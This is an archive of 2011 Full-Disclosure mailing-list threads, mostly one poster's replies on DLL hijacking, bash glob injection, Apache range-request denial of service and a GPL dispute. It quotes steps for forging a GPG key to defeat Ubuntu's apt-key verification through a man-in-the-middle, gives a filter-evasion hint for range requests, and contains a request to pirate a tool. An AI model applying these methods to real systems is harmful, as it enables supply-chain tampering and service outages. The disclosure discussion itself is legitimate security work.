I agree. I am only talking of the scenario where this service is pre-installed. But before it was all about 3rd party addons wich run as a service... it is not happening, i can tell u this from many yrs of exp with windows, it wont happen. MS will not rewrite sdks,ddks,its whole stdafx/msdn architecture for coding, because of 3rd party addons.. cheers. xd On 26 September 2011 11:41, Madhur Ahuja ahuja.mad...@gmail.com wrote: I agree. I am only talking of the scenario where this service is pre-installed. On Monday, September 26, 2011, Thor (Hammer of God) wrote: You'd have to be admin to install as a service, and the service would obviously need to then be running as local system to be of benefit (beyond what a normal user could do anyway) AND the installer would have to grant a normal user rights to overwrite it. Certainly possible, but the developer would have to go out of their way to screw that up. And if they did, it still wouldn't be because of the OS... T On Sep 25, 2011, at 6:18 PM, Travis Biehn tbi...@gmail.com wrote: GloW: there's a lot of 3rd party software that installs itself as windows services. -Travis On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD doo...@gmail.com wrote: Haha , too good and too true thor ! Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! Rofl x10. Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. Anyhow it has been a pleasure, ending this BS i think once and for all, lookup how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, wich are protected ofc, you cannot touch msgina.dll,without ALOT of help from a rootkit or something similar, in wich case, why would you need to ? You could add an admin, hidden, and in simple batfile script (yes i do have my own code but no it is not for kids..), this is 10seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll ? You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and total axcs to all sockets, meaning, all pipe control and thats where half of windows exchanges smb shares for one thing, you guys dont seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, or, even just working, and i would look but, you wont, cannot, and will never be able to, especially on newer systems of windows7-8. As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, and whatever patches they instilled, dont touch even service_table.. so, they have not given it a high prio,and why shuld they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont believe in many things MS, I know windows system, and how to break it, better than many people, and i can tell you now, this whole DLL hijack, is a complete and utter waste of your times. But... keep on going, maybe MS will send you another 'thankyou' email ;) xd / http://crazycoders.comcrazycoders.com / #haxnet@Ef On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.comwrote: Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] owning ubuntu apt-key net-update (maybe apt-get update related)
Aha, sounds like typical (unfortunately), the case of the 'sads' on Ubuntus behalf. This is what unfortunately stops somany people from reporting, just that BIT of acknowledgemnt, even just a thanks on theyre webpage, but instead they people think oh well, this guy has probably raped 5000 boxes then given us this , it must be the approach of some companies, or they have very pathetic secteams, (in ubuntus cause, -no comment rofl). anyhow thx for clearing that up. cheers, xd On 24 September 2011 01:00, Georgi Guninski gunin...@guninski.com wrote: On Fri, Sep 23, 2011 at 06:32:10AM +1000, GloW - XD wrote: So, this is an exploit then ? Or just a broken package ? Some people would simply not understand that,your very techy :P Anyhow, making a small .sh file for the bug would be cool.. if there is a bug to be had. cheers hi GloW, the bug appears real to me. ubuntu released an advisory [1] and debian have a bug [2]. ubuntu's advisory moderately hurt my narcissistic ego by not mentioning my humble name :( i suppose they have a corporate policy to give credit to whores only (this might be checked by examining which distros give credit and which write ``it was discovered'') as a minor boost to my narcissistic ego, ubuntu's advisory didn't contain CVE(R) ID :) next time ubuntu hurt my narcissistic ego, i will try the black market for the bug. [1] https://lists.ubuntu.com/archives/ubuntu-security-announce/2011-September/001424.html [2] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480 -- joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] owning ubuntu apt-key net-update (maybe apt-get update related)
So, this is an exploit then ? Or just a broken package ? Some people would simply not understand that,your very techy :P Anyhow, making a small .sh file for the bug would be cool.. if there is a bug to be had. cheers On 22 September 2011 22:03, Georgi Guninski gunin...@guninski.com wrote: # grep -rniI 'apt-key' /etc 2/dev/null /etc/cron.daily/apt:444:if eval apt-key net-update $XSTDERR; then /etc/cron.daily/apt:445:debug_echo apt-key net-update (success) /etc/cron.daily/apt:447:debug_echo apt-key net-update (failure) i suppose this effectively breaks vanilla apt-get update after cron is helped by MITM. the certs were verified to work after installed by apt-key net-update. -- joro On Thu, Sep 22, 2011 at 12:07:08PM +0300, Georgi Guninski wrote: owning ubuntu apt-key net-update (maybe apt-get update related) in ubuntu 10.04 in /usr/bin/apt-key in add_keys_with_verify_against_master_keyring() if $GPG_CMD --keyring $ADD_KEYRING --list-sigs --with-colons $add_key | grep ^sig | cut -d: -f5 | grep -q $master_key; then $GPG_CMD --quiet --batch --keyring $ADD_KEYRING --export $add_key | $GPG --import ADDED=1 to my knowledge --list-sigs doesn't do crypto verification, just looks for well formedness. it is trivial to generate a gpg key with key ID == $master_key: set gpg version to 3, set the lowest 64 bits of the RSA $n$ to the key ID, generate random high bits until one can trial factor $n$ (numerology is on your side), this is it. to reproduce: attached is ubuntu-archive-keyring.gpg. put it on http://A/ubuntu-archive-keyring.gpg make a copy of apt-key and set: ARCHIVE_KEYRING_URI=http://A/ubuntu-archive-keyring.gpg ^ this emulates MITM. do |./apt-key-new net-update| and check for new keys with |apt-key list| this might or might not be related with |apt-get update|. 10x. -- joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possibility to exploit bash * processing
Probably because anybody who's used the various Bourne-style shells for a while considers it a feature, not a bug This seems to be true. I was able to write a file to root, using a simple cat cmd similar, in BSD4.11,but when reporting it, Colin Percival seemed to think it more amusing... they did although patch it being able to write root, as i was able to write over the passwd file and add myself to it :P this was a bug, but not a big one according to the lists at the time, although when you can overwrite root, they might ask you to send them a private post to bugs@kernel ;P lol. have fun... thats not much tho... write a file now to another dir, then its a bug and cat maybe could still, it was only ever patched on bsd... problem was in gentoo tho also ;) later and, hope you have fun working with the secteams if you do find a deeper bug ;p look on BSD mailing lists for a cat bug...it is few years ago now but it is there.. i still have the links somewhere but dont have time to search, just lookup the bsd security lists if you need more infos about it or, i could send you the posts from colin when i am in the office and have more time. cheers xd oops, sorry i cc'd valdis, sorry this was aimed at author more,... dont have time to correct things i gotta run On 21 September 2011 04:31, valdis.kletni...@vt.edu wrote: On Tue, 20 Sep 2011 13:29:11 +0300, Kirils Solovjovs said: Brought this up a year ago. Seems that no attention has been given to this so far. Probably because anybody who's used the various Bourne-style shells for a while considers it a feature, not a bug. This is a case where the Principle of Least Surprise comes up with different answers for novice users and for experts: What? A * can expand into an unintended command argument? Yeah, what *else* would it do - the shell is just globbing, it doesn't know for sure what the command will do with the parameter. Multics had an alternate solution for this issue - when you issued a command, it would get invoked right then and there and take over terminal input and allow guided completions knowing what the command syntax was (think love child of getopt and readline ;) Of course, this doesn't play well with pipes, especially if the pipe further down the line has a redirection that fails. One solution would be to modify * processing so that it ignores filenames that start - similarly as it ignores filenames that start with .' No, you don't want to do that. You want to provide an *optional* flag, similar to the shopt settings for 'dotglob', 'extglob', 'failglob', 'globstar', 'nocaseglob', and 'nullglob'. Having said that, a 'shopt dashglob' shouldn't be too hard to implement, as you can do 98% of it based on the already-existing 'dotglob' code, and that's probably the way to address the issue. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache Killer
Aha this is exactly what me and kcope were discussing, and he pointed out that size exactly (however he did not know how to replicate to get to it i think),he mentioned the bucket size being able to be pushed to the exact amount you just said then, wich is alone enough to really reak some havoc on things with even using this still ithin the bouncs of the httpd, altho i am guessing if you send a huge amount of the right request, it would cause a DoS also. i am about to look at your code and hope i havent just repeated what you said (again), but your spoton about where im speaking about and exactly what i meant... the size is the problem wich is still underlying things, if set very high, this consumes more resources on the target... wich can be a persistent attack really until this code is limited or, changed, or a mod made for ranges wich handles the ranges and any overflowing or misuse by local users, this is the biggest problem here, a malicious local user... i am suprised no one has tried to make this bigger yet, i know that there is a seperate apache attacking script wich was posted (mn.pl) but this did not have the sufficient pulling power of a request-Range type attack... wich if dne right, i think could still lead to possibly atleast a local memory exhaustion... i dont think it could get as bad as the actual bug was, but with the range boundarys how they are, and filter settings against things like 'bytes=' and to monitor if bytes=0-, wich is kinda useless, if you use ByTes= the filter is useless... unless there is some settings made specially for upper/lower and even setting spaces in between.. I guess this is still a problem when you have the size of one single bucket at 2725, and i have heard, even higher, that was actually the first reason this whole thing came about, was the discussions around the size of ONE container alone, wich at that time was about 4850 i believe, around that figure... so, it has not chnged much, or it has not changed atall i have not tried to build it in a way that can cause destruction fast,but from what i did see and read, if setup right, the range function or request-range, could eat memory and spit it out like chewing tobacco. Anyhow, to me it is still partly an issue, I am looking for a way to now block ALL Request-Range requests, and range: requests, in BSD8.2 (stable) Ipfw rules, so i guess this will have to be good to block this, or maybe a script running alongside apache to watch the range sizes, but, i will still persist with trying to find a better solution than range fileds,or a better way to recieve and handle ALL range requests, it is still not good enough from a produxction endpoint, altho it might be worth checking the range filter section and maybe add to it something where it automatically blocks mutiple single digit ex: 5- , 5- , 5- - block it (higher) number requests.. it is not much but, it is the only thing wich seems to be repetitious to make any of these attacks now effective, considering the advisory sparked a tonne of apache updates wich is fine by me, as i watched the damage it did to a completely un protected box and my jaw dropped.. but to then know it is still possible to do almost the same thing, using the same code, well, thats just not designed right... coders could easily code things within limits of the ranges wich would be set lower if that is a security measure ever used, then i dont know why it has not been deployed already. People adapt, computers dont adapt without human intervention.. A trigger to notify/warn of large requests or some halt on requesting until admin is there, i dont know but there has to be a better way to restrict the range fields or containers or whatever people are calling it, but to me when something says bytes= , then thats = data. I hope that your apachekiller.pl doesnt kill my box to hard, but thanks for also your interest, and i know many others still hate to admit it but, it is the biggest thing really to hit apache for along time, something wich forced alot of updates, and some boxes may not even be able to have anything more done than medium patches, or temp fixes, because of just setup or the way the person has configured things, or it would take them to rebuild theyre entire network... this is what has occurred, and many boxes are still just not tested to it, the first exploit.pl for that was NOT correct because it involved mod-deflate and mod_gzip wich later from kcopes own mouth he said this was inn error, but, that code was still enough to do the job for pentesting.. still, it was not made according to the end advisory, and should be done that way, so all fields are tested, and all areas of the httpd are pushed, with some debug action to help people debug theyre networks, it would surely not be hard todo this, it is still a problem, and it wont go away unless the right tools are there to test for it everytime, and yea sure could maybe add to the code but really, it needed a recode for pentest
Re: [Full-disclosure] Full-Disclosure Digest, Vol 79, Issue 6
eh, you got the wrong w0rmie. and i dont kno what a HF is even. have a nice day dude, but you have the wrong person.. my nickname has never been that. either way, show me some proof of this dll hijacking thats useful , ?? and you would then 'know more', than me.. tell me something i dont know. xd and kid, growup. On 3 September 2011 21:16, Tomm Foo bl4kjeebus...@gmail.com wrote: what the..? gl0w0rm you dont know shiit bout nothin. keep hollerin at yo boys at HF, cause them cats is legit leet, bra. On Sep 3, 2011 4:00 AM, full-disclosure-requ...@lists.grok.org.uk wrote: Send Full-Disclosure mailing list submissions to full-disclosure@lists.grok.org.uk To subscribe or unsubscribe via the World Wide Web, visit https://lists.grok.org.uk/mailman/listinfo/full-disclosure or, via email, send a message with subject or body 'help' to full-disclosure-requ...@lists.grok.org.uk You can reach the person managing the list at full-disclosure-ow...@lists.grok.org.uk When replying, please edit your Subject line so it is more specific than Re: Contents of Full-Disclosure digest... Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you. Today's Topics: 1. Re: Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking (GloW - XD) -- Message: 1 Date: Sat, 3 Sep 2011 11:15:50 +1000 From: GloW - XD doo...@gmail.com Subject: Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking To: Mario Vilas mvi...@gmail.com Cc: full-disclosure@lists.grok.org.uk Message-ID: CALCvwp7VqDQ-9wzuSNSFF6QgaDgTPRh=FXU47RUsj987NT2w=a...@mail.gmail.com Content-Type: text/plain; charset=windows-1252 I must agree, considering i have yet to see it used in even botnet circles, who would surely have used a decent local exploit if it was 'decent'... I know this dll hijacking, has gone unpassed to the community in general because of its useless ness. I agree completely, i never have seen this actively exploited, nor part of a decent framework where it can be used in a remote or local session Basically, it is something to wich i read the PDF on, and thought here is the most useless 'exploit' as it was being called , i have ever, laid eyes on , my opinion still has yet to be changed by any factor, there could be many factors, ie: exploitation even in the wild reported, or just someone saying hey dont forget blah.c! , but this aint happened, nor will... hey wanna read msdn and look and see how a lib is loaded would make more sense. I still dont see anything 'good' in this whole fiasco of the dll hijacking. no active code/poc. etc etc etc as i said, many factors id reconsider my stance on... anyhow, enjoyable topic. xd On 3 September 2011 11:03, Mario Vilas mvi...@gmail.com wrote: I disagree. If this so called vulnerability had any added value in terms of social engineering, it would actually make sense to report it. Social engineering isn't bad, I really don't care how leet it is. My claim is simpler: this advisory makes no sense at all, because it replaces an easy way of exploitation for a hard way of exploitation, so its added value is actually *negative* for the attacker. Most likely whoever found this is new in the infosec world and never stopped to consider this details - he/she just blindly repeated what the dll injection crowd was doing and posted whatever results were found, without understanding really well what was going on. And THAT is the state of infosec today. People who report stuff for the sake of reporting, without really understanding how things work or why. On Fri, Sep 2, 2011 at 11:46 PM, valdis.kletni...@vt.edu wrote: On Fri, 02 Sep 2011 20:55:35 -, Thor (Hammer of God) said: LOL. Warning, if you get the user to execute code, then it is possible to get the user to execute code!! All you have to do is get files on their system, and then get them to execute those files! Note that once you get the user to execute the code, it will actually run in the context of that user!! This is remote code execution vulnerability! Welcome to today's Infosec! The sad part is that this is the future of infosec as well. Microsoft got the security religion a few years back, and even I have to admit their current stuff isn't that bad at all. The various Linux distros are (slowly) getting their acts together, and maybe even Apple and Adobe will see the light sometime reasonably soon. Yes, there will still be software failures - but once the effort of finding a new 0-day reaches a certain point, the economics change And once that happens, social engineering will become an even bigger part of both the attack and defense sides of infosec. For the black hats, the cost
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
but if you execute a trusted vbs, you would successfully exploit anything wouldnt you ? id would be like running a dll using rundll32.exe my.dll , cept a vbs :s to me makes no sense, never has, and i know what loadlibrary does, i looked at the implications of theyre advisories, i remember when we were swarmed by about 100 dlls wich were not 'unloaded' rproperly... lol... ok anyhow, this makes no sense, executing a trusted vbs is 'script' many viruses have been named .vbs and run vb script...right? so why would we need news on this... xd On 3 September 2011 07:53, Nahuel Grisolia nah...@bonsai-sec.com wrote: List, On 09/02/2011 06:45 PM, root wrote: You don't get the worst part: unsuccessful exploitation also leads to code execution. Scary stuff. On 09/02/2011 05:05 PM, Mario Vilas wrote: Are you guys seriously reporting that double clicking on a malicious .vbs file could lead to remote code execution? :P Either I'm missing something (and I'd welcome a rebuttal here!) or you might as well add .exe to that list. All those extensions are already executable. I think that they're talking about that executing a trusted vbs could lead to the execution of malicious code. :S regards, -- Nahuel Grisolia - C|EH Information Security Consultant Bonsai Information Security Project Leader http://www.bonsai-sec.com/ (+54-11) 4777-3107 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
hi, hope you are well, Prediction 3: Until spammers learn PROP use of english, things wont change, the spam will still ahve speeling errors. thats about the only thing saving some of us i think... thats my own observation, and seems to go back to when i was phreaking 'engineering' via telephone, using att pbx cards, to act like a security engineer at att to get more cards, wich, lasted many years... the people who could NOT phish, and relied on the few who could, were all europeans, wich yes now this has changed. originally, and in general, the better use of language wich is what prevails with most social engineering in any format and will always continue to, however, the use of english is also nowdays becoming easier to learn, people are becoming smarter from each failure, wich is why computers failure rate dissolves. Social engineering was the basis of many hackers/black or white, in some form, many years ago... there is not much documented on it but hey, im just yer avergae Eric jones. Anyhow, have a good day sir, interesting topically, in 2011.. cheers, xd On 3 September 2011 07:46, valdis.kletni...@vt.edu wrote: On Fri, 02 Sep 2011 20:55:35 -, Thor (Hammer of God) said: LOL. Warning, if you get the user to execute code, then it is possible to get the user to execute code!! All you have to do is get files on their system, and then get them to execute those files! Note that once you get the user to execute the code, it will actually run in the context of that user!! This is remote code execution vulnerability! Welcome to today's Infosec! The sad part is that this is the future of infosec as well. Microsoft got the security religion a few years back, and even I have to admit their current stuff isn't that bad at all. The various Linux distros are (slowly) getting their acts together, and maybe even Apple and Adobe will see the light sometime reasonably soon. Yes, there will still be software failures - but once the effort of finding a new 0-day reaches a certain point, the economics change And once that happens, social engineering will become an even bigger part of both the attack and defense sides of infosec. For the black hats, the cost/ benefit of looking for effective 0-day holes will continue to drop, while the cost/benefit of phishing a user will remain steady - so that's a push towards more social engineering. Why go to the effort of spending 3 months finding a browser bug that allows you to push malware to the victim's machine, when you can just spend 45 minutes creating a Your machine is infected - click here to fix it pop-up that will catch 80% of the people? Meanwhile, as the software gets more hardened and patching is more automated, the white hats will find a bigger percent of their time is spent defending their systems from attacks triggered by their own users. Because the failure rate of people's brains is already about 4.7*10**9 times as high as the software failure rate, and the ratio is only getting worse - software is improving, people aren't. Prediction 1: 10 years from now, organized crime will be hiring cognitive psychologists to help design more effective phish the way they currently hire programmers to write better spambots. Prediction 2: It ain't gonna get better till the average IQ starts going up faster than the software improves. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
I must agree, considering i have yet to see it used in even botnet circles, who would surely have used a decent local exploit if it was 'decent'... I know this dll hijacking, has gone unpassed to the community in general because of its useless ness. I agree completely, i never have seen this actively exploited, nor part of a decent framework where it can be used in a remote or local session Basically, it is something to wich i read the PDF on, and thought here is the most useless 'exploit' as it was being called , i have ever, laid eyes on , my opinion still has yet to be changed by any factor, there could be many factors, ie: exploitation even in the wild reported, or just someone saying hey dont forget blah.c! , but this aint happened, nor will... hey wanna read msdn and look and see how a lib is loaded would make more sense. I still dont see anything 'good' in this whole fiasco of the dll hijacking. no active code/poc. etc etc etc as i said, many factors id reconsider my stance on... anyhow, enjoyable topic. xd On 3 September 2011 11:03, Mario Vilas mvi...@gmail.com wrote: I disagree. If this so called vulnerability had any added value in terms of social engineering, it would actually make sense to report it. Social engineering isn't bad, I really don't care how leet it is. My claim is simpler: this advisory makes no sense at all, because it replaces an easy way of exploitation for a hard way of exploitation, so its added value is actually *negative* for the attacker. Most likely whoever found this is new in the infosec world and never stopped to consider this details - he/she just blindly repeated what the dll injection crowd was doing and posted whatever results were found, without understanding really well what was going on. And THAT is the state of infosec today. People who report stuff for the sake of reporting, without really understanding how things work or why. On Fri, Sep 2, 2011 at 11:46 PM, valdis.kletni...@vt.edu wrote: On Fri, 02 Sep 2011 20:55:35 -, Thor (Hammer of God) said: LOL. Warning, if you get the user to execute code, then it is possible to get the user to execute code!! All you have to do is get files on their system, and then get them to execute those files! Note that once you get the user to execute the code, it will actually run in the context of that user!! This is remote code execution vulnerability! Welcome to today's Infosec! The sad part is that this is the future of infosec as well. Microsoft got the security religion a few years back, and even I have to admit their current stuff isn't that bad at all. The various Linux distros are (slowly) getting their acts together, and maybe even Apple and Adobe will see the light sometime reasonably soon. Yes, there will still be software failures - but once the effort of finding a new 0-day reaches a certain point, the economics change And once that happens, social engineering will become an even bigger part of both the attack and defense sides of infosec. For the black hats, the cost/ benefit of looking for effective 0-day holes will continue to drop, while the cost/benefit of phishing a user will remain steady - so that's a push towards more social engineering. Why go to the effort of spending 3 months finding a browser bug that allows you to push malware to the victim's machine, when you can just spend 45 minutes creating a Your machine is infected - click here to fix it pop-up that will catch 80% of the people? Meanwhile, as the software gets more hardened and patching is more automated, the white hats will find a bigger percent of their time is spent defending their systems from attacks triggered by their own users. Because the failure rate of people's brains is already about 4.7*10**9 times as high as the software failure rate, and the ratio is only getting worse - software is improving, people aren't. Prediction 1: 10 years from now, organized crime will be hiring cognitive psychologists to help design more effective phish the way they currently hire programmers to write better spambots. Prediction 2: It ain't gonna get better till the average IQ starts going up faster than the software improves. -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
woah! OK so it is not that nice to deface another product, thats kinda why i do pick on it myself but about the GPL, well i have to help anyone on this one, including tighvnc themself, as they did release this as open src software remember, Let me try and explain this abit better/clearer.. Regarding the GPL, I dont think the guy has breached it directly or indirectly. Ofcourse, if he has, wich i dont thinkso* then he would be subject to being sued by either TighVNC group, or Metasploit. IF the INSECT pro exploit for tightvnc/code wich is used for that, is being manipulated AT ALL , that is at compile time, if it is modified from the original code, to the end user/product. IF that is the case, then tighVNC would be able to scrutinize the insect pro maker,and perhaps even take it to small claims or worse, direct defamation of product, wich would not be a good/smart thing todo for anyone. So, i think this should clear up alittle of this small debacle wich has broken about GPL... GPL is usually there to protect the src code in the GPL (named), but is also, not to be used in ways wich defame, wich is why it exists.. if tightvnc wanted to now, they could look at ALL its uses and scrutinize them in every case, and why the code is being used. It is something wich is verymuch now up to them and up to wether people have modified theyre code. regards, xd - This isnt a company making a big product, Im doing this because I like doing it. Good for you. I think that is great. But you are pretending to be a big company. Stop that. I am happy to see you removed that silly donation-for-download scheme. I'm not forcing you to use my software, if you don't like it please don't waste bandwith on it. Fantastic advice. We are working on a JAVA version in order to support multi-plataform, and because I really like to JAVA I did too, until I learned how to program. Oracle's purchase/murder also hastened my departure. Might I suggest C++/Qt? :-) Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
So basically once you sign over a GPL v2 , you sign over any right to misuse even the code wich you have written ? i guess i thought this could be scrutinized outside of the GPL via means of a solicitor but, if the law is complacent about use and misse then, i guess thats that and your correct, i have actually yes, used myself the CC lisence and was thinking the gpl was just a simpler version but seems that is probably safer to go wityh CC i guess there atleast you have some say over mis-use in cases where you specify wich docunments in particular, ie: sourcecode1.cpp,source2.cpp and v.cpp must not be modified... the rest could be.., for example. Ohwell, that shoots any theory then of why it is even being mentioned in the list, other than to potentially harm all users of tightvnc src. Stranger things have happened i guess.. Sorry for my earlier report and, enjoy the code! lol xd cheers Valdis .. On 31 August 2011 14:14, valdis.kletni...@vt.edu wrote: On Wed, 31 Aug 2011 13:36:12 +1000, GloW - XD said: So, i think this should clear up alittle of this small debacle wich has broken about GPL... GPL is usually there to protect the src code in the GPL (named), but is also, not to be used in ways wich defame, wich is why it exists.. if tightvnc wanted to now, they could look at ALL its uses and scrutinize them in every case, and why the code is being used. It is something wich is verymuch now up to them and up to wether people have modified theyre code. Ahem. What the GPL V2 actually says: 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. Not to defame is an additional restriction, as is scrutinize why the code is being used. You can't do either of those for a GPL-licensed package - you may be thinking of some of the Creative Commons licenses. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Telecom/Chat Servers = 2.0.1.1 Blind Exploitation Attack Vulnerability
think u have the wrong person buddy. xd On 27 August 2011 16:26, Xianuro GL xianur0.n...@gmail.com wrote: Hey, please do not spoof my email address, thanks xD ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
hi! ahhh... awesome stuff :-) i will have a look and see if it is as good as the author has said it is, thankyou. xd On 27 August 2011 21:54, Mario Vilas mvi...@gmail.com wrote: On Sat, Aug 27, 2011 at 4:27 AM, GloW - XD doo...@gmail.com wrote: when is smeone going to warez this... it aint free.. http://www.insecurityresearch.com/files/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
when is smeone going to warez this... it aint free.. but since its ad here...well, shouldnt we b able to get a copy, thru the wares community : cheers! waiting on those links to come pourin in1 This tool does sound great, i just wont pay for a domplete app without some form of trial...heck metasploit is pro version to, but, they atleast provide a stable and useable free version... insect needs a nudge ! On 27 August 2011 12:02, Juan Sacco jsa...@insecurityresearch.com wrote: We are happy to announce a new release of INSECT Pro 2.7 including changes that people ask about most often This is a partial list of the major changes implented in version 2.7 - Available targets now has a submenu under right-click button - Check update function added in order to verify current version - Threading support for GET request - Module log added and functional - Sniffer support added - 50 Remote exploits added - Project saved on userland - Application Data special folder - Executed module windows added and functionality for it - AgentConnect now use telnetlib Download now from: http://www.insecurityresearch.com Juan Sacco (runlvl) -- -- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.7 was released stay tunned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
